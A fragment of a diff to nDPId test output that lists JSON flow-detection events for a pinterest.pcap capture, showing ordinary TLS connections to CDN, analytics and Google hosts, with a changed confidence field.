{"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} 00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 